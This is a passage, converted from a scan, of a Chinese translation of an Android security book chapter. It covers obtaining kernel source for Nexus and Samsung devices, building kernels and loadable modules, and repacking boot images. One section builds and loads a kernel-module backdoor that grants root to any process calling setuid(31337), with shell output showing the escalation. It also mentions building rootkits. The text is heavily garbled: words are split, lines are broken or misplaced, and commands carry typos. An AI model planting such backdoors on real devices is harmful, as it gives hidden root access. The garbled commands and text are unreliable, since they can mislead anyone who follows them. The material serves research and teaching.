注意 找 不 到 内 核 源 代码 时 ， 可 以 直接 联系 厂商 要 求 其 发 布 源 代码 。 如 果 需 要 ， 提 醒 他 们 要 合 
法 遵守 Linux 内 核 的 GPL 协议 。 
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在 大 多 数 情况 下 ， 都 能 直接 获取 特定 设备 的 内 核 源 代码 ， 但 有 一 些 情况 会 比较 困难 。 例 如 
OEM 和 谷歌 在 发 布 新 设备 的 时 候 ， 很 晚 才 会 提供 内 核 源 代码 。 一 般 来 说 ， 暂 时 无 法 获得 少数 内 
核 源 代码 的 时 候 ， 只 要 耐心 等 待 即 可 。 

1. 获取 AOSP 内 核 源 代码 

谷歌 的 Nexus 系列 Android 产品 线 已 经 成 为 了 开发 者 的 参考 实现 。 可 以 获得 系统 中 几乎 所 有 
的 源 代码 ， 包 括 内 核 。Nexus 设备 的 源 代码 能 够 非常 直接 地 得 到 ; 找到 设备 使 用 哪 一 个 版 本 的 内 
核 源 代码 也 很 容易 , 但 并 不 是 一 步 就 能 做 到 的 。 在 AOSP 当中 两 个 特定 的 地 方 , 可 以 找到 内 核 相 
关 的 信息 : 第 一 个 地 方 包含 了 跟 设备 家 族 相关 的 内 核 信息 ; 第 二 个 包含 了 不 同 的 内 核 源 代码 树 。 
本 节 会 以 搭载 Android 4.2.2 系统 的 Galaxy Nexus 为 例 ， 介 绍 如 何 根 据 这 两 个 地 方 来 找到 准确 的 
内 核 源 代码 。 

谷歌 把 设备 相关 的 代码 仓库 放 在 AOSP 中 的 device 目录 。 这 些 仓库 包含 Makefile、 overlay、 
头 文件 、 配 置 文件 , 还 有 名 为 kernel 的 内 核 二 进 制 文件 一 一 这 个 文件 特别 重要 ， 因 为 根据 它 的 历 
史 就 能 找到 编译 时 使 用 的 源 代码 。 关 于 这 些 仓 库 , 谷歌 在 AOSP 文档 中 提供 了 相关 信息 ， 地址 为 
http://source.android.com/source/building-kernels.html。 在 这 些 仓库 中 ，kernel 文件 的 commit 信息 
和 文档 ， 都 要 落后 于 新 设备 的 发 布 ， 因 此 这 些 仓库 仅 用 来 建立 设备 到 芯片 的 关联 。 图 10-1 提供 










































































了 一 些 AOSP 支持 设备 到 芯片 的 映射 关系 ， 包 括 内 核 。 

Nexus 7 2013 Wi-Fi MSM 
Nexus 7 2013 Mobile MSM 
Nexus 10 Exynos 5 
Nexus 4 MSM 
Nexus 7 2012 Wi-Fi Tegra 
Nexus 7 2012 Mobile Tegra 
Galaxy Nexus OMAP 
Galaxy Nexus CDMA/LTE OMAP 
Pandaboard OMAP 
Motorola Xoom Verizon Tegra 
Motorola Xoom Wi-Fi Tegra 
NexusS Exynos 3 
Nexus S 4G Exynos 3 














图 10-1 AOSP 设备 到 芯片 的 映射 


正如 第 3 章 中 提 到 的 , 通常 可 以 使 用 /dev/block/platform 目录 下 的 条 目 , 来 确定 设备 使 用 的 
芯片 。 

shell@android:/dev/block/platform $ 1S 

omap 

知道 了 设备 的 SoC 制造 商 之 后 ， 就 能 用 Git 来 从 谷歌 获得 内 核 源 代码 。AOSP 为 每 一 个 支持 
的 SoC 设置 了 一 个 Git 仓库。 图 10-2 展示 了 谷歌 支持 的 每 一 个 SoC 内 核 树 的 仓库 名 称 。 
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| Exynos 5 exynos 








| Tegra 
OMAP omap 


图 10-2 SoC 的 内 核 名 称 


在 图 10-1 中 ， 可 以 看 到 目标 设备 是 基于 OMAP SoC 的 ， 下 面 的 命令 展示 了 如 何 clone 对 应 
的 内 核 源 代码 : 


dev:~/android/src $ mkdir kernel && cd S$_ 

dev:~/android/src/kernel $ git clone \ 
https://android.googlesource.com/kernel/omap.git 

Cloning into 'omap'... 

remote: Counting objects: 41264, done 

remote: Finding sources: 100% (39/39) 

remote: Getting sizes: 100% (24/24) 

remote: Compressing objects: 100% (24/24) 

Receiving objects: 100% (2117273/2117273), 441.45 MiB | 1.79 MiB/s, done 
remote: Total 2117273 (delta 1769060), reused 2117249 (delta 1769054) 
Resolving deltas: 100% (1769107/1769107), done. 


clone 操作 完成 后 ， 就 在 master 分 支 得 到 了 一 个 仓库 。 然 而 ， 你 会 注意 到 在 当前 工作 目录 下 
没有 文件 。 
dev:~/android/src/kernel $ cd omap 


dev:~/android/src/kernel/omap $ ls 
dev:~/android/src/kernel/omap $ 


master 分 支 下 的 AOSP 内 核 树 一 直 都 是 空 的 。 在 Git 仓库 中 ,， .git 目录 包含 了 还 原 开发 历史 中 
任意 一 个 工作 副本 所 需要 的 全 部 信息 。 对 master 分 支 进行 check out 操作 是 一 个 删除 所 有 已 追踪 
文件 的 好 办 法 ， 从 而 减少 存储 空间 。 

要 获得 AOSP 支持 设备 的 内 核 源 代 码 , 最 后 一 步 是 check out 正确 的 commit。 如 前 所 述 , device 
目录 下 内 核 文件 的 commit 日 志 总 是 落后 于 最 新 的 内 核 . 为 了 解决 这 个 问题 ,可 以 使 用 proc/version 
下 的 版 本 字符 串 ， 或 者 一 个 解压 后 的 内 核 镜像 。 下 面 的 命令 展示 了 整个 过 程 : 

shell@android:/ $ cat /proc/version 
Linux version 3.0.31-g9f818de (android-pbuild@vpbsl.mtv.corp.google.com) 


(gcc version 4.6.x-google 20120106 (prerelease) (GCC) ) #1 SMP PREEMPT 
Wed Nov 28 11:20:29 PST 2012 


在 上 面 引 用 的 内 容 中 ， 最 重要 的 是 内 核 版 本 号 中 3.0.31-g 后 面 的 7 位 十 六 进 制 数 字 : 
9f818dqe。 用 这 个 字符 串 就 能 check out 出 准确 的 commit。 


dev:~/android/src/kernel/omap $ git checkout 9f818de 
HEAD is now at 9f818de... mm: Hold a file reference in madvise _ remove 


目前 ， 你 已 经 成 功 获得 了 目标 设备 的 内 核 源 代码 副本 ， 在 本 章 后 面 的 部 分 中 大 有 用 处 。 
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后 通 


本 章 











2. 获得 OEM 内 核 源 代码 


对 于 不 同 的 厂商 ， 获 得 OEM 设备 源 代码 的 方法 也 不 一 样 。OEM 很 少 以 提供 版 本 控制 (Git 
等 ) 的 方式 发 布 源 代码 ， 大 多 数 厂 商都 会 提供 一 个 开源 站 点 以 供 下 载 。 关 于 OEM 如 何 发 布 源 代 











码 的 更 多 信息 请 参考 附录 B。 找 到 OEM 的 站 点 后 ， 下 一 步 就 是 在 上 面 搜索 目标 设备 的 型 号 ， 然 


常 能 找到 可 下 载 的 内 核 源 代码 和 相关 编译 指南 的 文件 包 。 由 于 不 同 OEM 的 差别 较 大 ， 所 以 





不 作 详 细 介 绍 。10.3.5 节 会 介绍 编译 OEM 设备 内 核 的 步骤 。 











10.3.2 ”搭建 编译 环境 


编译 工具 链 ， 以 及 各 种 编译 工具 ， 如 make。 正 如 第 7 章 中 讨论 的 ， 有 好 几 个 编 



































编译 自 定义 内 核 模块 或 内 核 二 进 制 文件 需要 一 个 正确 的 编译 环境 。 这 个 环境 必须 包含 ARM 
































译 工 


具 链 可 以 用 。 


OEM 厂商 会 将 特定 设备 所 使 用 的 编译 器 记录 在 内 核 源 代码 包 的 文本 文件 中 。 对 于 不 同 的 工具 链 ， 
搭建 编译 环境 的 步骤 也 不 同 。 本 章 使 用 AOSP 中 预 编 译 好 的 工具 链 ; 其 他 工具 链 不 在 本 章 介绍 范 





途 和 


使 用 






































相关 工具 。 


围 内 ,如 果 要 使 用 它们 ,请 参考 其 文档 。 只 需要 几 步 就 可 以 搭建 内 核 编译 环境 ,获得 可 用 的 编译 




















第 一 步 是 基于 AOSP 预 编 译 的 工具 链 来 搭建 编译 环境 , 这 与 第 7 章 内 容 相 同 。 下 面 这 个 例子 




















了 Android 4.3 系统 ， 但 无 论 版 本 为 何 ， 步 又 都 是 相同 的 。 


dev:~/android/src $ . buildq/envsetup .sh 
including device/samsung/maguro/vendorsetup.sh 
including sdk/bash_ completion/adb.bash 
dev:~/android/src $ lunch full maguro-userdebug 


过 





PLATFORM_VERSION_CODENAME=RED 
PLATFORM_VERSION=4.3 
TARGET_PRODUCT=full_maguro 
TARGET_BUILD_ VARIANT=userdebug 
TARGET_BUILD_TYPE=release 
TARGET_BUILD_APPS= 
TARGET_ARCH=arm 
TARGET_ARCH_VARIANT=armv7-a-neon 
TARGET_CPU_VARIANT=cortex-a9 
HOST_ARCH=x86 

HOST_OS=]inux 
HOST_OS_EXTRA=Linux-3.2.0-52-generic-x86_64-with-Ubuntu-12.04-precise 
HOST_BUILD_TYPE=release 
BUILD_ID=JWR66Y 

OUT_DIR=out 


dev:~/android/src $ 
这 样 ， 目 录 下 就 有 了 编译 工具 链 ， 可 以 通过 查询 编译 器 的 版 本 来 确认 。 


dev:~/android/src $ arm-eabi-gcc --version 
arm-eabi-gcc (GCC) 4.7 
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Copyright (C) 2012 Free Software Foundation, Inc. 
| 








编译 内 核 还 需要 额外 的 一 个 步 又 , 就 是 为 内 核 编译 系统 设 定 几 个 环境 变 
告诉 内 核 。 


dev:~/android/src $ cd kernel/omap/ 
dev:~/android/src/kernel/omap $ export CROSS_COMPILE=arm-eabi- 
dev:~/android/src/kernel/omap $ export SUBARCH=arm 
dev:~/android/src/kernel/omap $ export ARCH=arm 
dev:~/android/src/kernel/omap $ 


里 ， 


三 








dt 





巴 使 用 的 工具 链 


注意 编译 内 核 时 ， 要 使 用 arm-eabi 编译 器 ， 而 不 是 arm-linux-androideabi 编译 器 。 使 用 不 正确 
的 EABI 会 导致 编译 失败 。 








设置 完 这 些 变 量 之 后 ,环境 就 完全 搭建 好 了 , 准备 进入 下 一 步 ,编译 自 定义 模块 或 内 核 。 但 





在 此 之 前 ， 需 要 对 内 核 进行 配置 。 


10.3.3 ”配置 内 核 


Linux 内 核 支持 很 多 架构 和 硬件 组 件 。 为 了 能 够 给 任意 一 种 配置 组 合 编译 内 核 镜像 ，Linux 























内 核 使 用 了 一 种 可 扩展 的 配置 子 系统 。Linux 内 核 还 为 配置 子 系统 提供 了 多 种 配置 界面 ， 包 括 基 


于 QT 的 图 形 用 户 界面 (GUI ) ( make xconfig )， 基 于 文本 的 菜单 (make 
答 接口 (make config )。Android 开发 者 网 站 的 文档 描述 了 Android 内 核 中 
选项 : http://source.android.com/devices/tech/kernel.html。 




















enuconfig ) 和 问 
必需 的 和 推荐 的 配置 








另 一 种 配置 Android 内 核 的 最 常见 方式 , 是 指定 一 个 叫 作 defeonfig 的 配置 模板 。 这 个 模板 存 
储 在 内 核 源 代码 的 arch/arnyconfigs 目录 中 。 每 个 Android 设备 都 有 相应 的 配置 模板 来 编译 内 核 。 





Galaxy Nexus 的 配置 样 例文 件 如 下 : 


dev:~/android/src/kernel/omap $ make tuna defconfig 
HOSTCC scripts/basic/fixdep 

HOSTCC scripts/kconfig/conf.o 

SHIPPED SCripte/ keonftLrg/zeonf..tab:e 

SHIPPED scripts/kconfig/lex.zconf.c 

SHIPPED scripts/kconfig/zconf.hash.c 





HOSTCE scripts/kconfig/zconf.tab.o 
HOSTLD scripts/kconfig/conf 

# 

# configuration written to .config 

# 








在 上 面 的 片段 中 , 内 核 编译 系统 首先 编译 一 些 用 来 处 理 配置 模板 文件 的 依赖 ， 然 后 读 取 配 置 




































































模板 ， 写 人 .config 文件 。 不 同 的 配置 方法 会 最 终 写 人 文件 。 尽 管 可 以 直接 编辑 这 个 文件 ,但 是 我 














们 推荐 编辑 模板 。 








在 少数 情况 下 ，AOSP 代码 树 中 的 内 核 配置 文件 与 设备 的 内 核 中 实际 使 用 的 配置 不 匹配 。 例 
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如 Nexus 4 的 内 核 中 禁用 了 coNFIG_MODULES ， 但 是 AOSP 中 的 make_dqefconfig 开启 了 
CONFIG_MODULES。 如 果 内 核 编译 时 启用 了 coNFIG_IKCONFIG 选项 ， 就 可 以 使 用 内 核 scripts 
目录 下 的 extract-ikconfig， 从 解压 后 的 内 核 中 提取 配置 。 另 外 ， 配 置 文件 也 会 被 压缩 存储 
到 启动 后 设备 的 /proc/config.gz 文件 中 。 不 幸 的 是 ， 如 果 内 核 没有 启用 这 个 选项 ， 就 很 难 从 内 核 
中 提取 配置 参数 。 

在 搭建 完 编译 环境 并 配置 完 内 核 后 ， 就 已 经 为 编译 自 定 义 的 内 核 或 模块 作 好 了 准备 。 


10.3.4 使 用 自 定义 内 核 模块 


使 用 可 加 载 内 核 模块 (LKM ) 来 扩展 Linux 内 核 非常 方便 ,无 需 编译 整个 内 核 。 构造 rootkit 
时 ， 修 改 内 核 代码 和 /或 数据 是 必需 的 。 男 外 ， 在 内 核 空 间 执行 代码 可 以 调用 一 些 特 权 接 口 ， 例 
如 TrustZone。 本 节 以 一 个 简单 的 LKM 为 例 ， 来 介绍 几 个 内 核 提 供 的 工具 。 
编译 Android 设备 内 核 模块 的 方法 与 平时 不 同 。 一 般 来 说 ， 编 译 Linux 系统 的 内 核 模块 会 用 
到 /lib/modules 特定 版 本 目录 下 的 头 文件 ， 因 为 内 核 模 块 必须 与 加 载 它 们 的 内 核 兼 容 。Android 设 
备 中 没有 这 个 目录 ， 也 没有 相应 文件 包 ， 好 在 内 核 源 代码 解决 了 这 个 问题 。 

之 前 的 章节 介绍 了 如 何 得 到 Galaxy Nexus 的 Android 2.2 系统 内 核 源 代码 ， 如 何 搭建 编译 环 
境 , 以 及 如 何 对 内 核 进行 配置 。 在 此 基础 上 , 可 以 既 快 速 又 轻松 地 实现 一 个 “Hello World” 内 核 。 
为 了 对 修改 进行 单独 追踪 ， 我们 从 对 应 版 本 的 设备 内 核 源 代码 上 新 建 一 个 分 支 : 


dev:~/android/src/kernel/omap $ git checkout 9f818de -b ahh modules 
Checking out files: 100% (37662/37662), done. 
Switched to a new branch 'ahh modules' 


分 支 创建 完成 后 ,解压 本 章 附带 材料 中 的 内 核 模 块 源 代码 。 


dev:~/android/src/kernel/omap $ tar zxf ~/ahh/chapter10/ahh modules.tgz 
dev:~/android/src/kernel/omap $ 


这 在 Linux 内 核 源 代码 的 drivers 目录 下 创建 了 两 个 新 目录 ， 分 别 包含 一 个 模块 。 下 面 是 从 
“Hello World” 内 核 模块 中 截取 的 一 个 代码 片段 : 


int init module (void) 


{ 
























































































































































printk (KERN_INFO "%$s: HELLO WORLD!@#!@#\n", _ this module.name); 


/* force an error so we don't stay loaded */ 
EE 


} 
与 其 他 的 Linux 发 行 版 类 似 , 在 编译 模块 之 前 无 需 编译 整个 内 核 , 只 需要 几 个 步骤 就 可 以 了 ， 
相关 命令 如 下 : 
dev:~/android/src/kernel/omap $ make prepare modules_prepare 
scripts/kconfig/conf --silentoldconfig Kconfig 
CHK include/linux/version.h 


UPD include/linux/version.h 


[人 
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HOSTCC scripts/kallsyms 
这 个 命令 是 必需 的 ， 它 为 编译 内 核 模 块 生成 了 必要 的 脚本 和 头 文件 。 
接 下 来 使 用 “Hello World”LKM 源 代码 中 的 命令 来 编译 内 核 模块 。 命 令 的 输出 如 下 : 


dev:~/android/src/kernel/omap $ make ARCH=arm CONFIG _ AHH_HELLOWORLD=m \ 
M=drivers/ahh_ helloworld 




















WARNING: Symbol version dump ~/android/src/kernel/omap/Module.symvers 
is missing; modules will have no dependencies and modversions. 


LD [M] drivers/ahh_ helloworld/ahh_ helloworld mod.ko 
在 编译 过 程 中 会 出 现 一 个 警告 , 但 是 编译 仍然 成 功 。 如 果 你 对 于 程序 依赖 和 模块 的 版 本 化 没 
有 和 需求， 就 没 必要 去 修复 它 。 如 果 有 这 方面 的 需求 ,或 者 只 是 不 想 看 到 这 些 烦人 的 警告 , 编译 所 
有 模块 就 能 解决 问题 : 


dev:~/android/src/kernel/omap $ make modules 
CHK include/linux/version.h 
CHK include/generated/utsrelease.h 













































































LD [M] drivers/scsi/scsi wait_scan.ko 


站 


“Hello World” 模 块 编译 完成 后 ， 就 可 以 把 它 推送 到 设备 上 ， 并 深入 正在 运行 的 内 核 中 : 


dev:~/android/src/kernel/omap $ adb push \ 

drivers/ahh helloworld/ahh helloworld mod.ko /data/local/tmp 
788 KB/s (32557 bytes in 0.040s) 
dev:~/android/src/kernel/omap $ adb shell 
shell@android:/data/local/tmp $ su 
root@android:/data/local/tmp # insmod ahh_ helloworld_ mod.ko 


推送 内 核 后 ， 用 ADB 打开 一 个 shell。 在 root 权 限 下 ,使 用 insmoad 命令 来 插入 内 核 模块 ， 
然后 内 核 就 开始 加 载 模 块 并 开始 执行 init_mogdule 函数 。 用 amesg 命令 来 查看 内 核 的 环形 组 


ee 可 以 看 到 如 下 消息 : 


root@android:/data/local/tmp # dmesg | ./busybox tail -1 
<6>[74062.026855] ahh_helloworld _ mod: HELLO WORLD!@#!@# 


root@android:/data/local/tmp +# 

材料 中 的 第 二 个 内 核 模块 叫 作 ahh_setuidq, 是 更 加 高 级 的 例子 。 这 个 模块 使 用 简单 的 插 桩 10 
技术 制作 了 一 个 后 门 ， 使 任意 以 用 户 ID31337 为 参数 来 调用 setuia 系统 调用 的 程序 获得 root 
权限 。 编 译 和 安装 的 过 程 跟 之 前 相同 : 


dev:~/android/src/kernel/omap $ make ARCH=arm CONFIG AHH_SETUID=m \ 
=drivers/ahh_setuid 


| 
LD [M] drivers/ahh_setuid/ahh_ setuid mod.ko 
ev:~/android/src/kernel/omap $ adb push drivers/ahh_ setuid/ahh_ setuid mod.ko \ 


q 
/data/local/tmp 
6 

q 















































48 KB/s (26105 bytes in 0.039s) 
ev:~/android/src/kernel/omap $ adb shell 
shell@android:/data/local/tmp $ su 
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root@android:/data/local/tmp # insmod ahh_setuid mod.ko 

insmod: init module 'ahh_ setuid mod.ko' failed (Operation not permitted) 
shell@android:/data/local/tmp # exit 

shell@android:/data/local/tmp $ id 

uid=2000 (shell) gid=2000(shell) groups=1003 (graphics),1004 (input),... 
shell@android:/data/local/tmp $ ./setuid 31337 
shell@android:/data/local/tmp # id 

uid=0 (root) gid=0 (root) 


在 上 面 的 片段 当中 ， 运行 insmod 时 ,很 明显 有 一 个 错误 消息 。 这 是 因为 init_module 郴 
数 返 回 了 -1， 使 得 内 核 自 动 抒 载 这 个 模块 ， 在 下 次 装 入 前 不 用 手动 秃 载 。 退 出 root 用 户 后 ,使 
用 系统 调用 setuiq 31337， 就 能 再 次 获得 root 权限 。 

使 用 可 加 载 的 内 核 模块 来 扩展 内 核 十 分 方便 , 但 是 可 能 正 因为 如 此 ,一 些 Android 设备 中 的 
内 核 不 支持 可 加 载 内 核 模 块 。 可 以 通过 检查 proc 文件 系统 中 的 module 项 , 或 者 寻找 内 核 配 置 
当中 的 CONFIG_MODULES 值 来 判断 系统 是 否 支 持 可 加 载 内 核 模块 。 自 从 Android 4.3 发 布 后 ， 谷 
歌 就 禁用 了 所 有 Nexus 设备 的 可 加 载 内 核 模块 支持 。 


10.3.5 ”编译 自 定 义 内 核 


尽管 Linux 内 核 包 含 各 种 工具 ， 可 以 在 运行 时 配置 并 扩展 内 核 的 功能 , 但 是 有 一 部 分 功能 的 
修改 必须 要 求 重 新 编译 自 定义 内 核 。 一 些 配置 修改 ,例如 打开 调试 工具 ， 就 会 要 求 在 编译 时 加 上 
完整 的 文件 或 者 函数 。 本 章 已 经 介绍 了 如 何 获 取 源 代码 ,配置 编译 环境 以 及 配置 内 核 。 本 节 会 完 
成 AOSP 支持 的 Galaxy Nexus 和 三 星 Galaxy S III 的 内 核 编 译 过 程 。 

1. AOSP 支持 的 设备 

对 于 搭载 Android 4.2.2 的 Galaxy Nexus, 我 们 已 经 获得 了 正确 的 源 代 码 ,搭建 了 编译 环境 并 
配置 了 内 核 。 接 下 来 ， 只 需要 使 用 默认 的 make 就 可 以 编译 自 定义 的 内 核 ， 如 下 所 示 : 

dev:~/android/src/kernel/omap $ make 

[ed 


Kernel: arch/arm/boot/zImage is ready 
dev:~/android/src/kernel/omap $ 


编译 成 功 后 ， 系 统 会 将 编译 生成 的 内 核 镜像 号 入 arch/arm/boot 目录 下 的 zImage 文件 中 。 如 
果 发 生 错 误 ， 就 必须 在 编译 前 解决 。10.3.6 和 10.3.7 两 节 会 介绍 如 何 引导 编译 出 的 自 定义 内 核 。 






































































































































注意 ”对 于 所 有 AOSP 支持 的 设备 ， 包 括 Nexus 系列 的 所 有 设备 ， 编 译 自 定义 内 核 的 步骤 都 应 
该 是 相同 的 。 


2. OEM 设备 

OEM 设备 的 内 核 编 译 方法 与 AOSP 设备 非常 类 似 , 要 记得 OEM 制作 固件 时 使 用 的 代码 都 是 
从 AOSP 代 码 修改 而 来 的 ;而 不 同 厂 商 的 方法 会 有 所 差别 ,本 节 介 绍 如 何 为 Sprint 版 的 三 星 Galaxy 
SIJI (SPH-L710 ) 手机 编译 和 测试 自 定 义 内 核 。 目 标 是 生成 一 个 与 设备 现 有 内 核 兼 容 的 内 核 。 


















































10.3 运行 自 定义 内 核 代码 255 




















编译 前 首先 需要 明确 的 是 应 该 使 用 什么 源 代码 。 对 于 不 同 的 厂商 , 寻找 源 代码 的 方法 也 不 一 
样 。 如 果 比 较 幸运 ， 内 核 版 本 字符 串 引 用 的 正好 是 AOSP 的 GIT 仓库 中 菜 个 commit 哈 希 。 这 种 
情况 常见 于 较 老 的 设备 ， 因 为 厂商 直接 使 用 了 谷歌 提供 的 内 核 来 编译 。10.5.3 节 中 使 用 的 摩托 罗 
拉 Droid 手机 就 是 这 种 情况 。 可 以 使 用 如 下 命令 来 查看 设备 的 内 核 版 本 : 


shell@android:/ $ cat /proc/version 

Linux version 3.0.31-1130792 (se.infra@SEP-132) (gcc version 4.6.x- 
google 20120106 (prerelease) (GCC) ) #2 SMP PREEMPT Mon Apr 15 19:05:47 
KST 2013 


不 垃 的 是 ，Galaxy S II 没有 在 版 本 信息 中 包含 commit 哈 希 ， 因 而 需要 使 用 其 他 方法 。 
使 用 OEM 提供 的 内 核 源 代码 树 就 是 一 种 方法 ， 首 先 查 看 设备 在 编译 时 的 指纹 信息 : 


shell@android:/ $ getprop ro.build.fingerprint 
samsung/d2spr/d2spr:4.1.2/JZO54K/L710VPBMD4 :user/release-keys 


兼容 性 描述 文档 解释 了 这 个 系统 属性 由 下 列 域 组 成 〈 因 为 格式 原因 稍 作 修 改 ): 


$ (BRAND) /S(PRODUCT) /$ (DEVICE) :$ (RELEASE)/S(ID) /S$ (INCREMENTAL) :S (TYPE)/ 
$ (TAGS) 


比较 有 意思 的 是 第 二 组 域 : RELEASE、ID 和 INCREMENTAL 值 。 

首先 值得 注意 的 是 INCREMENTAL 域 。 许 多 厂商 都 把 INCREMENTAL 域 用 作 自 定义 版 本 号 ， 
包括 三 星 。 从 上 面 的 输出 结果 可 以 看 出 ， 三 星 将 这 个 固件 的 版 本 标记 为 L710VPBMD4。 

有 了 设备 型 号 (根据 ro.product .model 可 以 看 出 是 SPH-L710 ) 和 三 星 设 定 的 版 本 识别 
号 ， 就 能 去 三 星 的 开源 网 站 上 搜索 。 用 型 号 搜索 的 时 候 ， 会 看 到 搜索 结果 中 有 一 个 带 有 MD4 的 
下 载 链 接 。 点 击 下 载 后 ， 解 压缩 Kerneltargz 和 README Kemeltxt 文件 : 


dev:~/sph-1710 $ unzip SPH-L710_NA JB_ Opensource.zip Kernel.tar.gz \ 
README_Kernel .txt 
Archive: SPH-L710_NA _ JB_ Opensource.zZip 
inflating: Kernel.tar.gz 
inflating: README Kernel .txt 
dev:~/sph-1710 $ mkdir kernel 
dev:~/sph-1710 $ tar zxf Kernel.tar.gz -C kernel 
[EA 


解压 文件 后 ， 应 该 阅读 README_Kernel.txt 文件 。 其 中 的 指示 包括 应 该 使 用 什么 工具 链 和 
编译 配置 。 例 如 在 这 个 例子 中 , 说 明了 需要 使 用 arm-eabi-4.4.3 工具 链 和 m2_spr_defconfig 来 
配置 。 不 过 有 一 点 可 疑 的 是 ， 工具 链 编译 内 核 时 使 用 的 内 核 版 本 字符 串 是 gcc version 
4.6.x-google 20120106 (prerelease) 。 所 以 要 记 住 ， 之 前 找到 的 内 核 版 本 号 要 比 
README Kernel.txt 里 的 更 权威 。 

下 一 步 是 搭建 编译 环境 ,README_Kernel.txt 文 件 建议 使 用 AOSP 中 的 工具 链 。 为 了 避免 出 
现 问 题 ， 尽 量 使 用 与 设备 相符 合 的 编译 环境 ， 即 要 与 编译 指纹 当中 RELEASE 和 ID 域 相关 。 根 
据 之 前 的 结果 ， 目 标 设备 的 RELEASE 为 4.1.2，ID 为 JZ054K。 想 要 找到 具体 使 用 哪 一 个 tag， 
可 以 查询 Android 文档 中 的 “Codenames, Tags, and Build Numbers” 一 页 :http://source.android.com/ 
source/build0numbers.html。 查 询 JZ054K， 可 以 发 现 它 对 应 的 tag 是 androig-4.1.2_r1。 这 样 
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就 可 以 初始 化 AOSP 仓库 了 ， 如 下 所 示 : 


dev:~/sph-1710 $ mkdir aosp && cd $_ 
dev:~/sph-1710/aosp $ repo init -u AN 


https://android.googlesource.com/a/platform/manifest -b android-4.1.2_r1l 


dev:~/sph-1710/aosp $ repo Sync 
[| 








念 出 AOSP 仓库 正确 版 本 的 代码 ,就 可 以 准备 编译 内 核 了 。 但 在 编译 之 前 ， 
初始 化 ， 如 下 所 示 : 
dev:~/sph-1710/aosp $ . build/envsetup.sh 


[ais] 
dev:~/sph-1710/aosp $ lunch full-user 
































PLATFORM_VERSION_CODENAME=RED 
PLATFORM_VERSION=4.1.2 
TARGET_PRODUCT=full 
TARGET_BUILD_VARIANT=uSer 
TARGET_BUILD_TYPE=release 
TARGET_BUILD_APPS= 
TARGET_ARCH=arm 
TARGET_ARCH_VARIANT=armv7-a 
HOST_ARCH=x86 

HOST_OS=1]inux 


HOST_OS_EXTRA=Linux-3.2.0-54-generic-x86_64-with-Ubuntu-12.04-precise 


HOST_BUILD_TYPE=release 
BUILD_ID=JZO54K 
OUT_DIR=out 


dev:~/sph-1710/aosp $ export ARCH=arm 
dev:~/sph-1710/aosp $ export SUBARCH=arm 
dev:~/sph-1710/aosp $ export CROSS_COMPILE=arm-eabi- 














需要 完成 环境 的 


后 
TH 





这 样 ， 环 境 里 就 有 了 AOSP 的 预 编译 工具 链 。 与 编译 Galaxy Nexus 不 同 的 是 ， 这 里 要 使 用 


























full-user 编译 配置 。 除 此 之 外 ， 还 需要 设置 CROSS_COMPILE 环境 变量 ， 











README _ Kerneltxt 的 指示 ) 编辑 Makefile。 查 看 编译 器 的 版 本 : 


dev:~/sph-1710/aosp $ arm-eabi-gcc --version 
arm-eabi-gcc (GCC) 4.6.x-google 20120106 (prerelease) 
| 


























而 不 是 ( 根据 





很 好 ! 这 个 编译 器 版 本 与 运行 的 内 核 版 本 字符 串 相 匹配 。 理 论 上 , 使 用 这 个 工具 链 应 该 会 生 


成 一 个 与 设备 原 内 核 基本 相同 的 内 核 ， 至 少 是 互相 兼容 的 。 
根据 README _ Kernel.txt 文 件 中 的 信息 ， 可 以 配置 和 编译 内 核 : 


dev:~/sph-1710/aosp S cd ~/sph-1710/kernel 
dev:~/sph-1710/kernel $ make m2_spr_defconfig 
[| 

Hl 

# configuration written to .config 





10.3 运行 自 定义 内 核 代码 257 





# 
dev:~/sph-1710/kernel $ make 
[se eal 


Kernel: arch/arm/boot/zImage is ready 
如 果 一 切 按 计划 进行 , 内核 会 编译 成 功 , 并 生成 压缩 的 内 核 镜像 /arm/boot/zImage。 在 信息 安 
全 领域 ， 事 情 往往 不 会 这 人 么 顺利 。 编 译 内 核 时 ， 可 能 会 遇 到 一 个 特别 的 问题 ， 错 误 消 息 如 下 : 


























LZO arch/arm/boot/compressed/piggy.1zo 
/bin/sh: 1: lzop: not found 
make[2]: *** [arch/arm/boot/compressed/piggy.1zo] Error 1 
make[1]: *** [arch/arm/boot/compressed/vmlinux] Error 2 


make: *** [zImage] Error 2 
当 系统 缺乏 1zop 命令 时 ， 就 会 发 生 这 个 错误 。 三 星 使 用 LZO 算法 来 压缩 内 核 ， 牺 牲 存 储 
空间 来 提高 压缩 速度 。 安 装 这 个 工具 后 ， 再 次 运行 make 命令 ， 编 译 就 会 成 功 。 


10.3.6 ”制作 引导 镜像 


前 面 提 到 ，Android 设备 有 两 种 典型 的 引导 Linux 内 核 方式 : 第 一 种 就 是 正常 的 启动 过 程 ， 
使 用 boot 分 区 ; 第 二 种 是 启动 恢复 过 程 ， 使 用 recovery 分 区 。 这 两 个 分 区 的 文件 结构 是 相同 的 ， 
都 有 一 个 短 的 头 部 ， 一 个 压缩 的 内 核 ， 以 及 一 个 初始 的 ramdisk (initrd ) 镜像 。 二 者 通常 使 用 相 
同 的 内 核 , 但 也 有 例外 。 要 想 替 换 这 些 模式 下 的 内 核 ， 就 必须 为 新 的 内 核 重建 分 区 镜像 。 本 节 关 
注 的 是 boot.img。 

基于 现 有 的 引导 镜像 , 为 新 编译 出 来 的 自 定义 内 核 创建 引导 镜像 是 最 容易 的 。 第 一 步 是 获取 
一 个 镜像 。 虽 然 使 用 原 厂 固件 中 的 boot 镜像 通常 也 是 可 行 的 ， 但 是 直接 使 用 设备 中 的 镜像 更 加 
可 靠 。 因 为 设备 的 内 核 可 能 已 经 通过 OTA 升级 了 ， 所 以 使 用 一 个 直接 从 设备 中 获得 的 镜像 能 够 
确保 系统 正确 启动 。 获 得 设备 中 镜像 的 方法 ， 请 参考 10.2.2 节 。 

下 一 步 是 从 获得 的 引导 镜像 中 提取 文件 ,根据 10.2.3 节 中 的 步骤 操作 , 就 能 获得 bootimg.cfg、 
zImage 和 initrd.img 这 几 个 文件 。 


























































































































注意 虽然 解 包 和 打包 的 操作 经 常 在 运行 ADB 的 机 器 上 进行 , 但 事实 上 也 能 在 被 root 的 设备 
上 进行 。 


康 


跟 提取 内 核 类 似 ， 可 以 使 用 abootimg 工具 来 创建 boot 镜像 。abootimg 支持 两 种 使 用 情形 : 
更 新 和 创建 。 如 果 原 始 的 boot 镜像 不 需要 保存 ， 那 么 可 以 使 用 如 下 方式 直接 更 新 镜像 : 


dev:~/android/src/kernel/omap/staging $ abootimg -u cur-boot.img \ 
-k ../arch/arm/boot/zImage 

reading kernel from ../arch/arm/boot/zImage 

